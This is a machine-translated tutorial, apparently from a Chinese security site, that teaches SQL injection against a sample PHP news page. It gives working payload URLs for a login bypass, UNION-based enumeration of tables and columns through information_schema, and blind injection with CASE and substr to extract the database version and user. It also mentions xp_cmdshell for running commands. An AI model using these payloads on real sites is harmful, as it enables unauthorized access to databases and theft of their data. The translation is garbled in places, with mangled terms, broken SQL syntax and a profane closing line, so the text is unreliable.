Translation: Database Injection Technology

Www.2cto.com: original pdf (with pictures): http://up.2cto.com/2012/1120/20121120122511460.rar

SQL data injection is a basic network attack method for hacker to obtain sensitive information from the WEB through website applications. Today, it is the most common application attack method. In this way, hacker can obtain useful information through SQL Injection commands. The SQL injection allows users to enter relevant information so that SQL queries can bypass, affect, or directly execute database commands. For example, we generally think that the login form of a website program stores user information and has a simple SQL Execution statement for each login user, this is a typical demo Select * from users where username = 'admin' and password = 'admin123'. If an attacker knows that the website administrator is admin, t. Then he can log on without entering the password. Admin '-then the last statement executed becomes the statement following the Select * from users where username = 'admin'-and password = 'amdin123' comment number is ignored, therefore, the execution statement is equivalent to Select * from users where username = 'admin'. Therefore, the password check is bypassed. Different SQL injection modes have the following modes: (in-band) (out-band) (inferior) In-band: first, we can find many injection points through google. First, we open the homepage of the website. First, we simply add a separate 'After the URL to determine whether the injection point is used, http://192.168.2.3/ 'Error "Error in your SQL Syntax" is displayed on the page. This is because the single quotation marks added after the URL are carried into the website background for query. Therefore, we can confirm that the error message returned is an injection point. If the single quotation mark is blocked, we can try to use or 1 = 1-or and 1 = 1 at the end of the URL. http://192.168.2.3/ News-and-events.php? Id = 22 or 1 = 1- http://192.168.2.3/ News-and-events.php? Id = 22 and 1 = 1-since the preceding query statement is always true, the returned page information is correct. Now we use or 1 = 0-or and 1 = 0-after the URL- http://www.bkjia.com /News-and-events.php? Id = 22 and 1 = 0-the returned page is abnormal, because or 1 = 0-is permanent false. The strings listed below can be used to determine the injection point. You can also try to combine or a = a according to the or 1 = 1... Like #,-,/*,..... To extract the next step, we will use UNION and select to obtain database information and find DBMS: We can use the unique characteristics of the appropriate database to determine the database type (ms-SQL, mysql, oracle) MS-SQL: user_name () MYSQL: user () Oracle: select user from dual; for example: http://192.168.2.3/ News-and-events.php? Id =-22 union select 1, user_name (), 3, 4, 5, 6, and 7 the above URL returns the error message "Function user_name doesn't exist ". that is to say, the database type is not a MS-SQL, so let's try the user () http://192.168.2.3/ News-and-events.php? Id =-22 union select 1, user (), 3, 4, 5, 6, 7 the above address returns usr name, so we are sure this is the data type is MYSQL, so we can use 2, 3, obtain sensitive information and find the number of columns. We try to find the number of columns using union, as shown in the following figure: http://192.168.2.3/ News-and-events.php? Id = 22 union select NULL the page returns an error saying "Select statement having different number of columns". Then we know that there are more columns in the table, so we will not stop appending null. http://192.168.2.3/ News-and-events.php? Id = 22 union select NULL, NULL. The simpler way is to use order http://192.168.2.3/ News-and-events.php? Id = 22 order by 7-then use http://192.168.2.3/ News-and-events.php? Id =-22 union select 1, 2, 3, 4, 5, 6, 7 ================== pay attention to the-return information from the page before 22, you can see that 2.3.5.7 obtains the database version and name. http://192.168.2.3/ News-and-events.php? Id =-22 union select 1, @ version, database (), 4,5, 6. 7. The Echo information shows that the version is 5.0. The database name is nilakantatrust. Obtain the table name in the database. view the table name in the nilakantatrust database. http://192.168.2.3/ News-and-events.php? Id =-22 union select 1, group_concat (table_name), 3, 4, 5, 6, 7 from information_schema.tables where table_schema = database ()-after all the table names are displayed, the column name usage statement is displayed: http://192.168.2.3/ News-and-events.php? Id =-22 union select 1, group_concat (column_name), 3, 4, 5, 6, 7 from information_schema.columns where table_schema = database () -an attack such as password, SSN, creditcard number, user, and so on (this section does not know what to say directly google translate) is thrown Out of all the column names in the "nilakantatrust" database, use two different communication channels between attackers and applications. Modern DBMS has very powerful applications and data returned to users. They can, instruct to send emails and they can also communicate with the file system. All these functions are very useful for attackers. Attackers establish a database and connect directly to the data or malicious strings inserted into the database through a channel. DBMS response through a new channel, such as email, or execute commands using xp_mongoshell ,......Speculative InjectionThe server will not return any errors and other suggestive information, which is similar to normal blind injection. When the server receives an attack, it will not send any data to the attacker. Attackers need to use SQL commands for correct and wrong access. Attackers need to execute their commands according to the reaction of the website program, which makes SQL Injection more difficult but not impossible. Now let's practice: http://192.168.2.3/news-and-events.php ? Id = 22 and 1 = 1-The above URL returns the same page as the original site http://192.168.2.3/news-and-events.php ? Id = 22 and 1 = 0-return the page with an error, as we are in (in-band) the type is the same. Check the database type to see if the program uses the syntax of MSSQL. http://192.168.2.3/news-and-events.php ? Id = 21% 2b (select % 20 case % 20 when % 20 (select % 20user_name () % 20 then % 200% 20 else % 201% 20end % 20) -Let's make it clearer. http://192.168.2.3/news-and-events.php ? Id = 21 + (select case when (select user_name () then 0 else 1 end)-the purpose of the above URL is to add 1 to the ID '21' condition, when we access the ID21 url, the page information is different from the ID22url. % 2b is +, and % 20 is a space. This is URL encoding. When some special characters and symbols are filtered, we can use different codes to bypass them. The case syntax used in the condition query is used to operate user_name. If the predefined user_name can be found. 1. in this way, the ID is equal to 22. the returned page information is ID = 22. If user_name is not found, 0 is returned. In this way, ID + 0 or 21 is returned, and the page information is still the information when ID = 21. Figure M shows that the page does not use MSSQL when ID22 is not returned. Let's see if it is MYSQL. http://192.168.2.3/news-and-events.php ? Id = 21% 2b (select % 20 case % 20 when % 20 (select % 20 user () % 20 then % 200% 20 else % 201% 20end) -The URL above returns the page with ID = 22, indicating that the database is MYSQL. We use the substring function in MYSQL to view the version information. The syntax is as follows: http://192.168.2.3/news-and-events.php ? Id = 22% 20and % 20 substr (@ version,) = 5-if the database version is '5', then the substring function returns ('5 ′, because we are trying to extract only one character), when we compare the obtained value with '5 ′. Then, if we can see the home page, we can confirm that the database is a version similar to 5.xx. If the above url does not point to the home page, then we need to compare the value 4 or 3 = to determine more information about the database, we need to compare the second character of the database. Syntax substr (@ version,) = 0 substr (@ version,) = 1 query the database user name. We use the CASE and substring syntax together to query the database user name. For example: http://192.168.2.3/news-and-events.php ? Id = 22% 2b % 20 (select % 20 case % 20 when % 20 (substr (user (),) = 'A ') % 20 then % 200% 20 else % 201% 20end)-sort out: http://192.168.2.3/news-and-events.php ? Id = 22 + (select case when (substr (user (), 1,1) = 'A') then 0 else 1 end)-Application-based response, the character in the changing feature SUBSTR. Once we get the first letter of the user name, we will find the second letter and continue to find substr (user (), 2, 1) = 'R' substr (user (), 3, 1) = 'B' in this way, to find a single-character user name, we have to send more than 200 requests to the server to match possible ASCII characters. This technology can be optimized. We can extract characters from a single database within 8 requests. The visual test should be a binary method. Who knows? It is always translated !! FUCK